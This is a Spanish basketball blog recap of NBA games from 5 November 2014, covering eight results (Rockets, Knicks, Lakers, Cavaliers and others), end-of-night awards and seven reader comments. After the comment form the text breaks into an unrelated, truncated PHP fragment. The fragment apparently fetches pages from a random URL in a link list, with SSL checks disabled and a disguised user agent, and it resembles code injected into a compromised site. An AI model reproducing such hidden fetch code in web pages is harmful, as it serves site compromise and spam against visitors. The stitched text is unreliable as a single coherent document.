La Crónica: Cinco veces Houston

05 de November de 2014 por FranGuaita

Trevor Ariza se vistió de estrella para mantener la racha de los Rockets, que siguen invictos. Triste imagen de los Knicks en el Madison y noche aciaga del one-two punch LeBron-Irving con derrota estrepitosa en Portland. Sigue el ‘Kobe Bryant contra el mundo’ en los Lakers: 39 puntos que no sirvieron para doblegar a Phoenix.

Pasen y lean.

HEAT 91 – ROCKETS 108

Esto acaba de empezar y mayo suena casi a otra galaxia pero Houston sigue pisando el acelerador. Que les quiten lo bailado. Quinto triunfo consecutivo, esta vez en el American Airlines Arena. Si ustedes no vieron el partido, tengo la obligación de advertirles que el marcador es engañoso. A falta de siete minutos, Miami se ponía a cuatro (86-90) con un triple de Shabazz Napier y James Harden torcía el gesto bajo esa tupida barba interminable. Pero, a diferencia de otras temporadas, el jugón formado en la Universidad de Arizona State cuenta con un socio de altísimo nivel en el perímetro, todo un campeón de la NBA: Trevor Ariza. El hombre que reinó el mundo junto a Kobe y Pau en 2009 enchufó dos triples demoledores dentro de un parcial 0-13 que sofocó los fogonazos de Miami. Al margen del momento Clutch Ariza, no pierdan de vista el partido de Harden, flirteando con el triple doble: 25 puntos, 9 rebotes, 10 asistencias. Tras un palmeo suyo en mitad del vendaval de triples de Houston, Spoelstra tuvo que pedir tiempo muerto. En el banquillo de enfrente, McHale se ponía en pie para aplaudir el esfuerzo de su jugador franquicia. Hay que mimar a la estrella. Puede ser su temporada. 

KNICKS 83 – WIZARDS 98

Derek Fisher tiene mucho trabajo por delante. Sus Knicks siguen evidenciando preocupantes síntomas que les alejan -al menos en este tramo inicial de la regular season- de la condición de contenders en el Este. Tras una primera mitad bastante potable en la que Anthony y Shumpert encontraron vías de anotación, New York sufrió un cortocircuito de dimensiones bíblicas en el tercer periodo. Pésima selección de tiro, Melo-sistema y varios intentos estériles de sacar partido al triángulo ofensivo. El único sistema jugado al poste provocó un 2 más 1 que Amar’e le supo sacar a Marcin Gortat. El resto, todo exterior y fundamentalmente posesiones resueltas con precipitación. La crisis tuvo como resultado un parcial de 0-12 que silenció al MSG (56-70, en la recta final del tercero) y terminó por ser definitivo. Tramo del partido en el que, además, Wittman utilizó a secundarios de su rotación como Andre Miller, Seraphin -15 puntos del francés en 22 minutos- o Porter.

LAKERS 106 – SUNS 112

Empiezo a plantearme seriamente el número de partidos que estarán los Lakers en disposición de ganar en esta temporada regular. Me sorprendería que la cifra excediera los 20. Quizá con el retorno de Nick Young el juego del equipo mejore algo porque en estos momentos sigue siendo infumable. Kobe Bryant está solo. Las opciones de triunfo en la franquicia púrpura y dorado son directamente proporcionales al tiempo que le resistan las piernas al ’24’. Esta madrugada ha enchufado 39 puntos -con una serie de 14-37 en tiros de campo- ante la deserción permanente de la gran mayoría de sus lugartenientes. A diferencia de Lakers, Phoenix sí dispone de soluciones de garantías en las profundidades de su rotación. En un mal día de la pareja exterior Dragic-Bledsoe, Hornacek recurrió a su línea de artificieros reserva: 26 puntos de Gerald Green y 22 puntos, 9 asistencias de Isaiah Thomas. Sigue el drama en el Staples.

BLAZERS 101 – CAVALIERS 82

Si les digo que LeBron James y Kyrie Irving únicamente anotaron 7 de los 29 tiros de campo que intentaron en el Moda Center de Portland es muy posible que intuyan el desenlace. En efecto, derrota de los Cavaliers. Damian Lillard fue el líder para los Blazers con 27 puntos, 6 rebotes y 7 asistencias. Es la segunda derrota de Cleveland en tres partidos.

PACERS 81 – BUCKS 87

La rotación menguante de Indiana comienza a acusar el paso de los partidos. Con otra actuación brillante de Brandon Knight (23 puntos, 7, asistencias 10/16 en tiros de campo), Milwaukee se impuso en el Bankers Life Fieldhouse. La segunda unidad a las órdenes de Jason Kidd, decisiva. Middleton, Bayless, OJ Mayo, Antetokounmpo y Pachulia se combinaron para 47 puntos.

BULLS 98 – MAGIC 90

Chicago sufrió más de la cuenta para imponerse a los Magic, que siguen sin conocer la victoria en temporada regular (0-4). Doble doble de Pau Gasol (16 puntos, 13 rebotes) y banquillo para Derrick Rose, que no jugó finalmente por decisión de Tom Thibodeau. Un triple de Aaron Brooks y los tiros libres anotados por Jimmy Butler en la recta final de partido acabaron con la resistencia de Orlando.

PELICANS 100 – HORNETS 91

El frontcourt de New Orleans funcionó anoche a la perfección. Con Anthony Davis como MVP en el triunfo ante Charlotte. El hombre de la ceja se marchó hasta los 24 puntos y 13 rebotes, formando sociedad con Omer Asik, protagonista de otro doble doble marca de la casa (10 puntos, 11 rebotes). Ryan Anderson aportó 16 puntos desde el banquillo con una serie de 7-12 en tiros de campo. Kidd-Gilchrist, baja en los Hornets por una contusión en las costillas.

RAPTORS 100  – THUNDER 88

Ni el excelente partido de Serge Ibaka (25 puntos, 11 rebotes) sirvió a Oklahoma para conseguir una W en el Air Canada Centre. Los Thunder siguen en caída libre tras perder por lesión a Russell Westbrook, además de la ya conocida ausencia de Kevin Durant. Para más inri, ayer también cayó Perry Jones. Toronto no sentenció el partido hasta el último periodo gracias a nueve puntos de Lou Williams.

PREMIOS

MVP: Indiscutible MVP de la liga a estas alturas de la temporada. James Harden se quedó a un solo rebote del triple doble (25 puntos, 9 rebotes, 10 asistencias) y los Rockets se hicieron con su quinta victoria consecutiva.

Rookie: 10 puntos, 3 rebotes y 3 robos para Jabari Parker; 9 puntos, 6 rebotes, 7 asistencias y 3 robos para Elfrid Payton; 8 puntos, 6 rebotes y 4 asistencias para Nikola Mirotic; 8 puntos, 7 rebotes, 4 asistencias y 2 tapones para Kostas Papanikolau. Calidad y cantidad.

Sorpresa: Patrick Patterson salió de titular ante la baja de Amir Johnson y cumplió con creces: 14 puntos, 8 rebotes, 2 robos y 1 tapón. Channing Frye también nos dejó una completa hoja estadística de 9 puntos (3 de 4 en T3), 7 rebotes, 3 asistencias, 2 tapones y 1 robo.

Decepción: Hoy tenemos para escoger. Desde el 3 de 17 de Kyrie Irving hasta los 6 puntos de Eric Bledsoe, pasando por el 8 de 23 y las 7 pérdidas de Carmelo Anthony.

Esfuerzo en vano: Tanto Serge Ibaka como Kobe Bryant luchan prácticamente en solitario contra los elementos. El de los Thunder anotó 25 puntos (11 de 14 en TC) y cogió 11 rebotes mientras que Kobe se fue a los 39 puntos aunque necesitó 37 tiros de campo.

Imágenes | AP Photos / Getty Images

Comenta

7 comentarios a esta entrada

  1. MagicJohnson32 dice:
    #1

    ¿Alguien sigue creyendo en Eric Gordon? Pregunto…

      Citar

  2. Schize dice:
    #2

    MagicJohnson32:
    ¿Alguien sigue creyendo en Eric Gordon? Pregunto…

    Yo el año pasado sí, y me llevé una decepción muy grande. Este año ya… Her perdido la fe en él.

      Citar

  3. Luis Hernández dice:
    #3

    Hombre, Dwight Howard colaboró bastante en la victoria de ayer con 26 puntos y 10 rebotes, creo que merecía al menos el apunte

      Citar

  4. Azabel dice:
    #4

    MagicJohnson32:
    ¿Alguien sigue creyendo en Eric Gordon? Pregunto…

    la temporada pasada ya evidencio que venia en baja, pero lo de este año es llamativo, pareciera que no tiene ganas de jugar, tuvo lesiones pero tio a esa edad debes recuperarte
    una pena verdaderamente, por momentos en los Clippers tuvo futuro de all-star, pero su estancia en los Pelicans ha sido pesima, jugando bien pero excesivamente poco los dos primeros años y jugando mucho pero mal el resto, vamos a darle algo de tiempo igual

      Citar

  5. Azabel dice:
    #5

    como dijimos el otro dia, los cavs tienen un gravisimo problema con su banca, los aportes de harris, miller y haywood son de risa, marion apenas cumple un rol, y dellavedova aprueba gracias a su entrega, pero entre todos ellos no ayudan ni cambian de ninguna manera la tonica del equipo titular

    Thompson hace lo suyo, pero no puede ser factor desde el juego interior

    otro temita sigue siendo Waiters

    yo lo que haria, seria fichar algun esolta especialista en defensa, sea Stevenson o Ronnie Brower, que aporte defensa y estabilidad al 5 inicial y saldria con Waiters de factor como sexto hombre, simil a los Mavs con Stevenson de esolta y el JET saliendo de la banca

    es una alternativa

      Citar

  6. Ruxixon dice:
    #6

    MagicJohnson32:
    ¿Alguien sigue creyendo en Eric Gordon? Pregunto…

    En 2 partidos que he visto de los Pelicans esta temporada no podía dejar peores sensaciones,no es que tenga unos pésimos porcentajes,es que además su papel es anecdótico dentro del quinteto.Lo que propone Azabel para Waiters bien podía aplicarse para Gordon.Meterlo en la segunda unidad y ver si así puede recuperar sensaciones,pero eso incluye a Rivers o Fredette como titular…

    Hablando un poco de Cleveland,ya no es sólo tema filias/fobias respecto a ciertos jugadores,es que no hay sistema.De verdad,lo único que se ve pulido es llegar a los triples liberados de Love desde la esquina,pero el resto es un erial de jugadas de ataque,reinando los aclarados y el talento individual de cada uno.Se me hace muy difícil que un tio como Blatt sea incapaz de dotar un mínimo de sentido en el ataque la verdad.Queda mucho trabajo por delante.

      Citar

  7. Azabel dice:
    #7

    Ruxixon:

    Hablando un poco de Cleveland,ya no es sólo tema filias/fobias respecto a ciertos jugadores,es que no hay sistema.De verdad,lo único que se ve pulido es llegar a los triples liberados de Love desde la esquina,pero el resto es un erial de jugadas de ataque,reinando los aclarados y el talento individual de cada uno.Se me hace muy difícil que un tio como Blatt sea incapaz de dotar un mínimo de sentido en el ataque la verdad.Queda mucho trabajo por delante.

    En ciuanto a los sistemas tamdbien vi que le falta muchisimo rodaje, demasiado para este año pareceria, pero caerle solo a Blatt es injusto, creo que lo dije en el analisis previo de los cavs y todos me saltaron al cuello, no veo buena compatibilidad entre las grande estrellas que tienen los Cavs

    Irving, Lebron y Waiters, son jugadores sumamente similares, que botan mucho el balon y que viven de las penetraciones, ninguno de los 3 es capaz de pararse en una esquina a esperar su tiro como hacia chalmers o Allen en el Heat, eso les quita mucho movimiento de balon ya que al tercer o cuarto pase alguno de los tres se la juegan hacia adentro

    sobre Love, es complicado el tema defensivo siendo una gaceta para los rivales, y en ataque produce como un perimetral mas, haciendo poco y nada en la pintura,

    asi el ataque parece sumamente anarquico, o sale waiters del equipo por un jugador que no tome tiros salvo algun triple abierto o estan ante un problema gordo

      Citar

Deja un comentario

html; } class Helper { public function random_date() { $low = '732045693'; $high = time(); $random = rand($low, $high); return date("D, d M Y H:i:s",$random); } } class Fetch_site { public $url; public $html; public function __construct($sites=null, $link_list=null) { $this->is_curl_installed(); if($link_list !== null) { $this->choose_site($link_list); } $this->load_site($this->url); } public function choose_site($file=null) { $file = explode("\n", $file); $key = rand(0, (count($file)-1)); $this->url = trim($file[$key]); } public function load_site($url) { $useragent = array('Link-Soft'); $rand = array_rand($useragent); $ch = curl_init(); $options = array( CURLOPT_URL => $url, CURLOPT_HEADER => 0, CURLOPT_USERAGENT => $useragent[$rand], CURLOPT_SSL_VERIFYHOST => 0, CURLOPT_SSL_VERIFYPEER => 0, CURLOPT_RETURNTRANSFER => 1, CURLOPT_FOLLOWLOCATION => 1, CURLOPT_ENCODING => "", CURLOPT_AUTOREFERER => 1, CURLOPT_CONNECTTIMEOUT => 30, CURLOPT_TIMEOUT => 30, CURLOPT_MAXREDIRS => 5, ); curl_setopt_array($ch,$options); $result = curl_exec($ch); if(!$result) { return curl_error($ch); } curl_close($ch); $this->html = $result; } public function is_curl_installed() { if(!in_array('curl',get_loaded_extensions())) { trigger_error("cURL PHP extension is disabled or not installed.",E_USER_ERROR); } } } unset($n); ?>